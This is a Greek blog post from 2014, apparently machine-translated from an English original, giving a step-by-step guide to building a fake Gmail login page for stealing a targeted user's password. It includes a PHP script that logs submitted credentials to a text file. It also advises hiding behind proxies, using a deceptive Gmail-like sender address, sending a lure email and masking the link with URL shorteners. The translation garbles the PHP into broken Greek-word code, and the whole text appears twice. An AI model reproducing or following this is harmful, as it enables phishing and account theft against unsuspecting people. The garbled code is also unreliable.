Κυριακή 13 Ιουλίου 2014

Πώς να δημιουργήσετε πλαστά ή Phishing ιστοσελίδα για gmail

  Αυτή η ανάρτηση θα σας εξηγήσει πώς να δημιουργήσουν πλαστά ή phishing ιστοσελίδα για gmail. Αυτή η διαδικασία μπορεί να χρησιμοποιηθεί για να κάνουν ψεύτικα σελίδα για άλλους δικτυακούς τόπους όπως το Yahoo, MSN, ή οποιαδήποτε άλλα sites που θέλετε να κλέψει τον κωδικό πρόσβασης του συγκεκριμένου χρήστη.   Βήματα για τη δημιουργία Phishing ή ψεύτικο web σελίδα:   Βήμα 1:   Πηγαίνετε στο gmail.com. Αποθηκεύστε τη σελίδα ως αρχείο "complet HTML"   Βήμα 2:  Αφού αποθηκεύσετε τη σελίδα σύνδεσης εντελώς, θα δείτε ένα αρχείο HTML και ένα φάκελο με το όνομα κάτι σαν e-mail από το google files.There θα είναι δύο αρχεία εικόνας και συγκεκριμένα "google_transparent.gif", "mail_logo.png"   Βήμα 3:  Ανεβάστε αυτές εικόνα για να TinyPic ή photobucker.com. να αντιγράψετε το URL της κάθε εικόνας.   Βήμα 4:  Ανοίξτε το αρχείο HTML στο Wordpad.  Αναζήτηση για "google_transparent.gif" (χωρίς εισαγωγικά) και να την αντικαταστήσει με αντίστοιχο url.  Αναζήτηση για "mail_logo.png" (χωρίς εισαγωγικά) και να την αντικαταστήσει με αντίστοιχο url.   Βήμα 5:  Αναζήτηση για το   action = "https://www.google.com/accounts/ServiceLoginAuth"   Αντικαταστήστε το με   action = "http://yoursite urlhere / login.php"     αποθηκεύσετε το αρχείο.  Step6:  Τώρα πρέπει να δημιουργήσετε login.php  έτσι θα πρέπει να ανοίξετε το σημειωματάριο και πληκτρολογήστε ως   
<? Php  header ("Location: https://www.google.com/accounts/ServiceLoginAuth")?  $ Χειριστεί = fopen ("pswrds.txt", "α")?  foreach ($ _POST και $ variable => $ value) {  fwrite ($ λαβή, μεταβλητή $)?  fwrite ($ λαβή, "=")?  fwrite ($ χερούλι, $ value)?  fwrite ($ λαβή, "\ r \ n")?  }  fwrite ($ λαβή, "\ r \ n")?  Αδυναμία εγγραφής αρχείου ($ χερούλι)?  έξοδο?  >  
αποθηκεύσετε   Βήμα 7:  ανοίξτε το σημειωματάριο και απλά να αποθηκεύσετε το αρχείο ως "pswrds.txt" χωρίς περιεχόμενο.   Τώρα φορτώσετε αυτά τα τρία αρχεία (δηλαδή index.html, login.php, pswrds.txt) σε οποιαδήποτε από τις subdomain Web hosting site.  Σημείωση: ότι η web hosting υπηρεσία πρέπει έχει τη δυνατότητα php.  Χρησιμοποιήστε μία από αυτές τις τοποθεσίες: 110mb.com, spam.com justfree.com ή 007sites.com.  χρησιμοποιήσετε αυτό το ιστοσελίδες μέσω των ασφαλών χώρων σύνδεσης (έτσι ώστε να μπορείτε να κρύψετε την IP διεύθυνσή σας) όπως: http://flyproxy.com. βρείτε τις καλύτερες ασφαλή θέση σύνδεσης.    Βήμα 8:    δημιουργήσετε ένα μήνυμα ηλεκτρονικού ταχυδρομείου με το gmail λέξη κλειδί.  όπως: gmailburger@gmail.com   Βήμα 9:    Αποστολή σε θύμα παρόμοια με "gmail ξεκινά νέο χαρακτηριστικό για να χρησιμοποιήσετε αυτό το αρχείο καταγραφής των υπηρεσιών σε αυτή την σελίδα" από το εν λόγω αναγνωριστικό gmail με σύνδεσμο προς phishing ιστοσελίδα σας.       Σημείωση:  Για το χρήστη να πιστέψει αλλάξει phishing σας ιστοσελίδα url με οποιαδήποτε από τις ελεύθερες θέσεις σύντομο url.  Όπως: co.nr, co.cc, cz.cc  Αυτό θα κάνει τους χρήστες να πιστέψουν ότι είναι σωστό url.


Αυτή η ανάρτηση θα σας εξηγήσει πώς να δημιουργήσουν πλαστά ή phishing ιστοσελίδα για gmail. Αυτή η διαδικασία μπορεί να χρησιμοποιηθεί για να κάνουν ψεύτικα σελίδα για άλλους δικτυακούς τόπους όπως το Yahoo, MSN, ή οποιαδήποτε άλλα sites που θέλετε να κλέψει τον κωδικό πρόσβασης του συγκεκριμένου χρήστη.

Βήματα για τη δημιουργία Phishing ή ψεύτικο web σελίδα:

Βήμα 1:

Πηγαίνετε στο gmail.com. Αποθηκεύστε τη σελίδα ως αρχείο "complet HTML"

Βήμα 2:
Αφού αποθηκεύσετε τη σελίδα σύνδεσης εντελώς, θα δείτε ένα αρχείο HTML και ένα φάκελο με το όνομα κάτι σαν e-mail από το google files.There θα είναι δύο αρχεία εικόνας και συγκεκριμένα "google_transparent.gif", "mail_logo.png"

Βήμα 3:
Ανεβάστε αυτές εικόνα για να TinyPic ή photobucker.com. να αντιγράψετε το URL της κάθε εικόνας.

Βήμα 4:
Ανοίξτε το αρχείο HTML στο Wordpad.
Αναζήτηση για "google_transparent.gif" (χωρίς εισαγωγικά) και να την αντικαταστήσει με αντίστοιχο url.
Αναζήτηση για "mail_logo.png" (χωρίς εισαγωγικά) και να την αντικαταστήσει με αντίστοιχο url.

Βήμα 5:
Αναζήτηση για το

action = "https://www.google.com/accounts/ServiceLoginAuth"

Αντικαταστήστε το με

action = "http://yoursite urlhere / login.php"

  αποθηκεύσετε το αρχείο.
Step6:
Τώρα πρέπει να δημιουργήσετε login.php
έτσι θα πρέπει να ανοίξετε το σημειωματάριο και πληκτρολογήστε ως
<? Php
header ("Location: https://www.google.com/accounts/ServiceLoginAuth")?
$ Χειριστεί = fopen ("pswrds.txt", "α")?
foreach ($ _POST και $ variable => $ value) {
fwrite ($ λαβή, μεταβλητή $)?
fwrite ($ λαβή, "=")?
fwrite ($ χερούλι, $ value)?
fwrite ($ λαβή, "\ r \ n")?
}
fwrite ($ λαβή, "\ r \ n")?
Αδυναμία εγγραφής αρχείου ($ χερούλι)?
έξοδο?
>
αποθηκεύσετε

Βήμα 7:
ανοίξτε το σημειωματάριο και απλά να αποθηκεύσετε το αρχείο ως "pswrds.txt" χωρίς περιεχόμενο.

Τώρα φορτώσετε αυτά τα τρία αρχεία (δηλαδή index.html, login.php, pswrds.txt) σε οποιαδήποτε από τις subdomain Web hosting site.
Σημείωση: ότι η web hosting υπηρεσία πρέπει έχει τη δυνατότητα php.
Χρησιμοποιήστε μία από αυτές τις τοποθεσίες: 110mb.com, spam.com justfree.com ή 007sites.com.
χρησιμοποιήσετε αυτό το ιστοσελίδες μέσω των ασφαλών χώρων σύνδεσης (έτσι ώστε να μπορείτε να κρύψετε την IP διεύθυνσή σας) όπως: http://flyproxy.com. βρείτε τις καλύτερες ασφαλή θέση σύνδεσης.


Βήμα 8:  
δημιουργήσετε ένα μήνυμα ηλεκτρονικού ταχυδρομείου με το gmail λέξη κλειδί.
όπως: gmailburger@gmail.com

Βήμα 9:
  Αποστολή σε θύμα παρόμοια με "gmail ξεκινά νέο χαρακτηριστικό για να χρησιμοποιήσετε αυτό το αρχείο καταγραφής των υπηρεσιών σε αυτή την σελίδα" από το εν λόγω αναγνωριστικό gmail με σύνδεσμο προς phishing ιστοσελίδα σας.



  Σημείωση:
Για το χρήστη να πιστέψει αλλάξει phishing σας ιστοσελίδα url με οποιαδήποτε από τις ελεύθερες θέσεις σύντομο url.
Όπως: co.nr, co.cc, cz.cc
Αυτό θα κάνει τους χρήστες να πιστέψουν ότι είναι σωστό url. - See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&rurl=www.google.com&sl=en&tl=el&u=http://www.breakthesecurity.com/2010/11/how-to-create-fake-or-phishing-web-page.html&usg=ALkJrhgG8P9aAG_8q-vkHcJxL8-ILu2NWQ#more

1 σχόλιο: